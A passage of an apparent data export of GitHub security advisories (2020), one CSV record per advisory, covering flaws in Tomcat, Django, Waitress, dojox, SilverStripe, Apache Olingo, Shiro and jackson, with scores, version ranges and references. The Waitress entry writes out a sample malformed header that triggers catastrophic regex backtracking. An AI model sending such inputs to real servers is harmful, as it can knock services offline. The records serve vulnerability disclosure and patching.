+The Nokogiri RubyGem has patched its vendored copy of libxml2 in order to prevent this issue from affecting nokogiri.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'RubyGems', 'name': 'nokogiri'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.10.8'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-7595'}, {'type': 'WEB', 'url': 'https://github.com/sparklemotion/nokogiri/issues/1992'}, {'type': 'WEB', 'url': 'https://cert-portal.siemens.com/productcert/pdf/ssa-292794.pdf'}, {'type': 'WEB', 'url': 'https://github.com/rubysec/ruby-advisory-db/blob/master/gems/nokogiri/CVE-2020-7595.yml'}, {'type': 'PACKAGE', 'url': 'https://github.com/sparklemotion/nokogiri'}, {'type': 'WEB', 'url': 'https://gitlab.gnome.org/GNOME/libxml2/commit/0e1a49c89076'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2020/09/msg00009.html'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/545SPOI3ZPPNPX4TFRIVE4JVRTJRKULL/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/5R55ZR52RMBX24TQTWHCIWKJVRV6YAWI/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JDPF3AAVKUAKDYFMFKSIQSVVS3EEFPQH/'}, {'type': 'WEB', 'url': 'https://security.gentoo.org/glsa/202010-04'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20200702-0005/'}, {'type': 'WEB', 'url': 'https://us-cert.cisa.gov/ics/advisories/icsa-21-103-08'}, {'type': 'WEB', 'url': 'https://usn.ubuntu.com/4274-1/'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuapr2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujul2020.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujul2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuoct2021.html'}, {'type': 'WEB', 'url': 'http://lists.opensuse.org/opensuse-security-announce/2020-05/msg00047.html'}]","{'cwe_ids': ['CWE-835'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-02-18T18:58:16Z', 'nvd_published_at': '2020-01-21T23:15:00Z'}"
+1.4.0,GHSA-pg97-ww7h-5mjr,2021-08-19T17:21:06Z,2020-02-13T22:21:06Z,,['CVE-2019-10785'],XSS in dojox due to insufficient escape in dojox.xmpp.util.xmlEncode ,"### Impact
+_What kind of vulnerability is it? Who is impacted?_
+
+Potential XSS vulnerability for users of `dojox/xmpp` and `dojox/dtl`.
+
+### Patches
+_Has the problem been patched? What versions should users upgrade to?_
+
+Yes, patches are available for the 1.11 through 1.16 versions. Users should upgrade to one of these versions of Dojo:
+
+* 1.16.1
+* 1.15.2
+* 1.14.5
+* 1.13.6
+* 1.12.7
+* 1.11.9
+
+Users of Dojo 1.10.x and earlier should review this change and determine if it impacts them, and backport the change as appropriate.
+
+### Workarounds
+_Is there a way for users to fix or remediate the vulnerability without upgrading?_
+
+The change applied in https://github.com/dojo/dojox/pull/315 could get added separately as a patch.
+
+### For more information
+If you have any questions or comments about this advisory:
+* Open an issue in [dojo/dojox](https://github.com/dojo/dojox/)","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'dojox'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.11.9'}]}]}, {'package': {'ecosystem': 'npm', 'name': 'dojox'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.12.0'}, {'fixed': '1.12.7'}]}]}, {'package': {'ecosystem': 'npm', 'name': 'dojox'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.13.0'}, {'fixed': '1.13.6'}]}]}, {'package': {'ecosystem': 'npm', 'name': 'dojox'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.14.0'}, {'fixed': '1.14.5'}]}]}, {'package': {'ecosystem': 'npm', 'name': 'dojox'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.15.0'}, {'fixed': '1.15.2'}]}]}, {'package': {'ecosystem': 'npm', 'name': 'dojox'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.16.0'}, {'fixed': '1.16.1'}]}], 'versions': ['1.16.0']}]","[{'type': 'WEB', 'url': 'https://github.com/dojo/dojox/security/advisories/GHSA-pg97-ww7h-5mjr'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-10785'}, {'type': 'WEB', 'url': 'https://github.com/dojo/dojox/pull/315'}, {'type': 'WEB', 'url': 'https://github.com/dojo/dojox/commit/abd033a787c718abc1a390f480ac3ea61288e5ee'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2020/02/msg00033.html'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-DOJOX-548257'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-DOJOX-548257,'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2020-02-13T22:20:36Z', 'nvd_published_at': None}"
+1.4.0,GHSA-qxf4-chvg-4r8r,2021-08-19T19:30:36Z,2020-02-28T01:10:48Z,,['CVE-2020-1935'],Potential HTTP request smuggling in Apache Tomcat,"In Apache Tomcat 9.0.0.M1 to 9.0.30, 8.5.0 to 8.5.50 and 7.0.0 to 7.0.99 the HTTP header parsing code used an approach to end-of-line parsing that allowed some invalid HTTP headers to be parsed as valid. This led to a possibility of HTTP Request Smuggling if Tomcat was located behind a reverse proxy that incorrectly handled the invalid Transfer-Encoding header in a particular manner. Such a reverse proxy is considered unlikely.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.tomcat.embed:tomcat-embed-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '7.0.100'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.apache.tomcat.embed:tomcat-embed-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '8.0.0'}, {'fixed': '8.5.51'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.apache.tomcat.embed:tomcat-embed-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '9.0.0'}, {'fixed': '9.0.31'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.apache.tomcat:tomcat'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '7.0.100'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.apache.tomcat:tomcat'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '8.0.0'}, {'fixed': '8.5.51'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.apache.tomcat:tomcat'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '9.0.0'}, {'fixed': '9.0.31'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-1935'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r127f76181aceffea2bd4711b03c595d0f115f63e020348fe925a916c%40%3Cannounce.tomcat.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r441c1f30a252bf14b07396286f6abd8089ce4240e91323211f1a2d75@%3Cusers.tomcat.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r660cd379afe346f10d72c0eaa8459ccc95d83aff181671b7e9076919@%3Cusers.tomcat.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r7bc994c965a34876bd94d5ff15b4e1e30b6220a15eb9b47c81915b78@%3Ccommits.tomee.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r80e9c8417c77d52c62809168b96912bda70ddf7748f19f8210f745b1@%3Cusers.tomcat.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r9ce7918faf347e7aac32be930bf26c233b0b140fe37af0bb294158b6@%3Cdev.tomcat.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/ra5dee390ad2d60307b8362505c059cd6a726de4d146d63dfce1e05e7@%3Cusers.tomcat.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rc31cbabb46cdc58bbdd8519a8f64b6236b2635a3922bbeba0f0e3743@%3Ccommits.tomee.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rd547be0c9d821b4b1000a694b8e58ef9f5e2d66db03a31dfe77c4b18@%3Cusers.tomcat.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2020/03/msg00006.html'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2020/05/msg00026.html'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20200327-0005/'}, {'type': 'WEB', 'url': 'https://usn.ubuntu.com/4448-1/'}, {'type': 'WEB', 'url': 'https://www.debian.org/security/2020/dsa-4673'}, {'type': 'WEB', 'url': 'https://www.debian.org/security/2020/dsa-4680'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujan2021.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujul2020.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuoct2020.html'}, {'type': 'WEB', 'url': 'http://lists.opensuse.org/opensuse-security-announce/2020-03/msg00025.html'}]","{'cwe_ids': ['CWE-444'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2020-02-25T16:18:59Z', 'nvd_published_at': '2020-02-24T22:15:00Z'}"
+1.4.0,GHSA-73m2-3pwg-5fgc,2023-08-23T00:09:00Z,2020-02-04T03:07:31Z,,['CVE-2020-5236'],Catastrophic backtracking in regex allows Denial of Service in Waitress,"### Impact
+
+When waitress receives a header that contains invalid characters it will cause the regular expression engine to catastrophically backtrack causing the process to use 100% CPU time and blocking any other interactions.
+
+This would allow an attacker to send a single request with an invalid header and take the service offline.
+
+Invalid header example:
+
+```
+Bad-header: xxxxxxxxxxxxxxx\x10
+```
+
+Increasing the number of `x`'s in the header will increase the amount of time Waitress spends in the regular expression engine.
+
+This issue was introduced in version 1.4.2 when the regular expression was updated to attempt to match the behaviour required by errata associated with RFC7230.
+
+### Patches
+
+The regular expression that is used to validate incoming headers has been updated in version 1.4.3, it is recommended that people upgrade to the new version of Waitress as soon as possible.
+
+### Workarounds
+
+If you have deployed a reverse proxy in front of Waitress it may already be rejecting requests that include invalid headers.
+
+### Thanks
+
+The Pylons Project would like to thank [Fil Zembowicz](https://github.com/fzembow) for reaching out and disclosing this vulnerability!
+
+### References
+
+Catastrophic backtracking explained: https://www.regular-expressions.info/catastrophic.html
+
+### For more information
+If you have any questions or comments about this advisory:
+
+- open an issue at https://github.com/Pylons/waitress/issues (if not sensitive or security related)
+- email the Pylons Security mailing list: pylons-project-security@googlegroups.com (if security related)","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'waitress'}, 'ecosystem_specific': {'affected_functions': ['waitress.rfc7230.FIELD_CONTENT', 'waitress.rfc7230.FIELD_VALUE', 'waitress.rfc7230.OWS_STRIP']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.4.2'}, {'fixed': '1.4.3'}]}], 'versions': ['1.4.2']}]","[{'type': 'WEB', 'url': 'https://github.com/Pylons/waitress/security/advisories/GHSA-73m2-3pwg-5fgc'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-5236'}, {'type': 'WEB', 'url': 'https://github.com/Pylons/waitress/commit/6e46f9e3f014d64dd7d1e258eaf626e39870ee1f'}, {'type': 'PACKAGE', 'url': 'https://github.com/Pylons/waitress'}]","{'cwe_ids': ['CWE-400'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2020-02-04T03:06:40Z', 'nvd_published_at': None}"
+1.4.0,GHSA-hmr4-m2h5-33qx,2022-03-21T20:34:24Z,2020-02-11T21:03:20Z,,['CVE-2020-7471'],SQL injection in Django,"Django 1.11 before 1.11.28, 2.2 before 2.2.10, and 3.0 before 3.0.3 allows SQL Injection if untrusted data is used as a StringAgg delimiter (e.g., in Django applications that offer downloads of data as a series of rows with a user-specified column delimiter). By passing a suitably crafted delimiter to a contrib.postgres.aggregates.StringAgg instance, it was possible to break escaping and inject malicious SQL.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'django'}, 'ecosystem_specific': {'affected_functions': ['django.contrib.postgres.aggregates.StringAgg']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.11.28'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'django'}, 'ecosystem_specific': {'affected_functions': ['django.contrib.postgres.aggregates.StringAgg']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.0.0'}, {'fixed': '2.2.10'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'django'}, 'ecosystem_specific': {'affected_functions': ['django.contrib.postgres.aggregates.StringAgg']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.0.0'}, {'fixed': '3.0.3'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-7471'}, {'type': 'WEB', 'url': 'https://github.com/django/django/commit/001b0634cd309e372edb6d7d95d083d02b8e37bd'}, {'type': 'WEB', 'url': 'https://github.com/django/django/commit/505826b469b16ab36693360da9e11fd13213421b'}, {'type': 'WEB', 'url': 'https://github.com/django/django/commit/c67a368c16e4680b324b4f385398d638db4d8147'}, {'type': 'WEB', 'url': 'https://github.com/django/django/commit/eb31d845323618d688ad429479c6dda973056136'}, {'type': 'PACKAGE', 'url': 'https://github.com/django/django'}, {'type': 'WEB', 'url': 'https://groups.google.com/forum/#!topic/django-announce/X45S86X5bZI'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4A2AP4T7RKPBCLTI2NNQG3T6MINDUUMZ/'}, {'type': 'WEB', 'url': 'https://seclists.org/bugtraq/2020/Feb/30'}, {'type': 'WEB', 'url': 'https://security.gentoo.org/glsa/202004-17'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20200221-0006/'}, {'type': 'WEB', 'url': 'https://usn.ubuntu.com/4264-1/'}, {'type': 'WEB', 'url': 'https://www.debian.org/security/2020/dsa-4629'}, {'type': 'WEB', 'url': 'https://www.djangoproject.com/weblog/2020/feb/03/security-releases/'}, {'type': 'WEB', 'url': 'https://www.openwall.com/lists/oss-security/2020/02/03/1'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2020/02/03/1'}]","{'cwe_ids': ['CWE-89'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-02-05T15:07:21Z', 'nvd_published_at': None}"
+1.4.0,GHSA-qvrv-2x7x-78x2,2021-08-19T17:22:37Z,2020-02-24T17:33:31Z,,['CVE-2019-19325'],Reflected XSS in SilverStripe,"SilverStripe through 4.4.x before 4.4.5 and 4.5.x before 4.5.2 allows Reflected XSS on the login form and custom forms. Silverstripe Forms allow malicious HTML or JavaScript to be inserted through non-scalar FormField attributes, which allows performing XSS (Cross-Site Scripting) on some forms built with user input (Request data). This can lead to phishing attempts to obtain a user's credentials or other sensitive user input.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'silverstripe/framework'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.4.5'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'silverstripe/framework'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.5.0'}, {'fixed': '4.5.2'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-19325'}, {'type': 'WEB', 'url': 'https://github.com/silverstripe/silverstripe-framework/commit/49fda52b12ba59f0a04bcabf78425586a8779e89'}, {'type': 'WEB', 'url': 'https://www.silverstripe.org/download/security-releases/cve-2019-19325'}]","{'cwe_ids': ['CWE-78'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2020-02-18T20:11:37Z', 'nvd_published_at': None}"
+1.4.0,GHSA-mgh8-hcwj-h57v,2021-08-19T16:53:27Z,2020-02-04T22:37:43Z,,['CVE-2019-17554'],Improper Restriction of XML External Entity Reference in Apache Olingo,"The XML content type entity deserializer in Apache Olingo versions 4.0.0 to 4.6.0 is not configured to deny the resolution of external entities. Request with content type ""application/xml"", which trigger the deserialization of entities, can be used to trigger XXE attacks.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.olingo:odata-client-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.0.0'}, {'fixed': '4.7.0'}]}], 'database_specific': {'last_known_affected_version_range': '<= 4.6.0'}}, {'package': {'ecosystem': 'Maven', 'name': 'org.apache.olingo:odata-server-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.0.0'}, {'fixed': '4.7.0'}]}], 'database_specific': {'last_known_affected_version_range': '<= 4.6.0'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-17554'}, {'type': 'WEB', 'url': 'https://github.com/apache/olingo-odata4/commit/5948974ad28271818e2afe747c71cde56a7f2c63'}, {'type': 'WEB', 'url': 'https://github.com/apache/olingo-odata4/commit/c3f982db3d97e395d313ae8f231202bb2139882c'}, {'type': 'WEB', 'url': 'https://issues.apache.org/jira/browse/OLINGO-1409'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r6d03e45b81eab03580cf7f8bb51cb3e9a1b10a2cc0c6a2d3cc92ed0c@%3Cannounce.apache.org%3E'}, {'type': 'WEB', 'url': 'https://mail-archives.apache.org/mod_mbox/olingo-user/201912.mbox/%3CCAGSZ4d7Ty%3DL-n_iAzT6vcQp65BY29XZDS5tMoM8MdDrb1moM7A%40mail.gmail.com%3E'}, {'type': 'WEB', 'url': 'https://seclists.org/bugtraq/2019/Dec/11'}, {'type': 'WEB', 'url': 'http://packetstormsecurity.com/files/155619/Apache-Olingo-OData-4.6.x-XML-Injection.html'}]","{'cwe_ids': ['CWE-611'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2020-02-04T22:29:36Z', 'nvd_published_at': None}"
+1.4.0,GHSA-934x-72xh-5hrg,2021-08-19T17:15:08Z,2020-02-14T23:09:45Z,,['CVE-2019-10777'],OS command injection in aws-lambda,"In aws-lambda versions prior to version 1.0.5, the ""config.FunctioName"" is used to construct the argument used within the ""exec"" function without any sanitization. It is possible for a user to inject arbitrary commands to the ""zipCmd"" used within ""config.FunctionName"".","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'aws-lambda'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.0.5'}]}], 'database_specific': {'last_known_affected_version_range': '<= 1.0.4'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-10777'}, {'type': 'WEB', 'url': 'https://github.com/awspilot/cli-lambda-deploy'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-AWSLAMBDA-540839'}]","{'cwe_ids': ['CWE-78'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-02-13T19:57:58Z', 'nvd_published_at': None}"
+1.4.0,GHSA-c5r5-7pfh-6qg6,2023-08-28T19:12:01Z,2020-02-14T23:10:01Z,,['CVE-2019-10780'],BibTeX-Ruby vulnerable to OS command injection,BibTeX-ruby before 5.1.0 allows shell command injection due to unsanitized user input being passed directly to the built-in Ruby `Kernel.open` method through BibTeX.open.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'RubyGems', 'name': 'bibtex-ruby'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '5.1.0'}]}], 'database_specific': {'last_known_affected_version_range': '<= 5.0.1'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-10780'}, {'type': 'WEB', 'url': 'https://github.com/inukshuk/bibtex-ruby/commit/14406f4460f4e1ecabd25ca94f809b3ea7c5fb11'}, {'type': 'ADVISORY', 'url': 'https://github.com/advisories/GHSA-c5r5-7pfh-6qg6'}, {'type': 'PACKAGE', 'url': 'https://github.com/inukshuk/bibtex-ruby'}, {'type': 'WEB', 'url': 'https://github.com/rubysec/ruby-advisory-db/blob/master/gems/bibtex-ruby/CVE-2019-10780.yml'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-RUBY-BIBTEXRUBY-542602'}]","{'cwe_ids': ['CWE-78'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-02-13T20:45:35Z', 'nvd_published_at': None}"
+1.4.0,GHSA-r679-m633-g7wc,2023-03-06T20:47:04Z,2020-02-04T22:36:36Z,,['CVE-2019-12422'],Improper input validation in Apache Shiro,"Apache Shiro before 1.4.2, when using the default ""remember me"" configuration, cookies could be susceptible to a padding attack.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.shiro:shiro-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.4.2'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-12422'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/c9db14cfebfb8e74205884ed2bf2e2b30790ce24b7dde9191c82572c@%3Cdev.shiro.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r2d2612c034ab21a3a19d2132d47d3e4aa70105008dd58af62b653040@%3Ccommits.shiro.apache.org%3E'}]","{'cwe_ids': [], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-02-04T21:49:59Z', 'nvd_published_at': '2019-11-18T23:15:00Z'}"
+1.4.0,GHSA-r6j9-8759-g62w,2021-03-26T00:27:41Z,2020-02-04T22:39:19Z,,['CVE-2019-10172'],Improper Restriction of XML External Entity Reference in jackson-mapper-asl,A flaw was found in org.codehaus.jackson:jackson-mapper-asl:1.9.x libraries. XML external entity vulnerabilities similar to CVE-2016-3720 also affects codehaus jackson-mapper-asl libraries but in different classes.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.codehaus.jackson:jackson-mapper-asl'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.9.13'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-10172'}, {'type': 'WEB', 'url': 'https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-10172'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r0066c1e862613de402fee04e81cbe00bcd64b64a2711beb9a13c3b25%40%3Ccommits.cassandra.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r0066c1e862613de402fee04e81cbe00bcd64b64a2711beb9a13c3b25@%3Ccommits.cassandra.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r04ecadefb27cda84b699130b11b96427f1d8a7a4066d8292f7f15ed8%40%3Ccommon-issues.hadoop.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r04ecadefb27cda84b699130b11b96427f1d8a7a4066d8292f7f15ed8@%3Ccommon-issues.hadoop.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r08e1b73fabd986dcd2ddd7d09480504d1472264bed2f19b1d2002a9c%40%3Ccommon-issues.hadoop.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r08e1b73fabd986dcd2ddd7d09480504d1472264bed2f19b1d2002a9c@%3Ccommon-issues.hadoop.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r0d8c3e32a0a2d8a0b6118f5b3487d363afdda80c996d7b930097383d%40%3Ccommon-issues.hadoop.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r0d8c3e32a0a2d8a0b6118f5b3487d363afdda80c996d7b930097383d@%3Ccommon-issues.hadoop.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r0fbf2c60967bc9f73d7f5a62ad3b955789f9a14b950f42e99fca9b4e%40%3Cissues.hive.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r0fbf2c60967bc9f73d7f5a62ad3b955789f9a14b950f42e99fca9b4e@%3Cissues.hive.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r1cc8bce2cf3dfce08a64c4fa20bf38d33b56ad995cee2e382f522f83%40%3Ccommon-issues.hadoop.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r1cc8bce2cf3dfce08a64c4fa20bf38d33b56ad995cee2e382f522f83@%3Ccommon-issues.hadoop.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r1edabcfacdad42d3c830464e9cf07a9a489059a7b7a8642cf055542d%40%3Cissues.hive.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r1edabcfacdad42d3c830464e9cf07a9a489059a7b7a8642cf055542d@%3Cissues.hive.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r1f07e61b3ebabd3e5b4aa97bf1b26d98b793fdfa29a23dac60633f55%40%3Ccommon-issues.hadoop.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r1f07e61b3ebabd3e5b4aa97bf1b26d98b793fdfa29a23dac60633f55@%3Ccommon-issues.hadoop.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r21ac3570ce865b8f1e5d26e492aeb714a6aaa53a0c9a6f72ef181556%40%3Ccommits.cassandra.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r21ac3570ce865b8f1e5d26e492aeb714a6aaa53a0c9a6f72ef181556@%3Ccommits.cassandra.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r25e25973e9577c62fd0221b4b52990851adf11cbe33036bd67d4b13d%40%3Ccommits.cassandra.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r25e25973e9577c62fd0221b4b52990851adf11cbe33036bd67d4b13d@%3Ccommits.cassandra.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r33d25a342af84102903cd9dec8338a5bcba3ecfce10505bdfe793b92%40%3Ccommon-issues.hadoop.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r33d25a342af84102903cd9dec8338a5bcba3ecfce10505bdfe793b92@%3Ccommon-issues.hadoop.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r356592d9874ab4bc9da4754592f8aa6edc894c95e17e58484bc2af7a%40%3Cissues.hive.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r356592d9874ab4bc9da4754592f8aa6edc894c95e17e58484bc2af7a@%3Cissues.hive.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r37eb6579fa0bf94a72b6c978e2fee96f68a2b1b3ac1b1ce60aee86cf%40%3Ccommits.cassandra.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r37eb6579fa0bf94a72b6c978e2fee96f68a2b1b3ac1b1ce60aee86cf@%3Ccommits.cassandra.apache.org%3E'}, {'type': 'WEB', 'url': 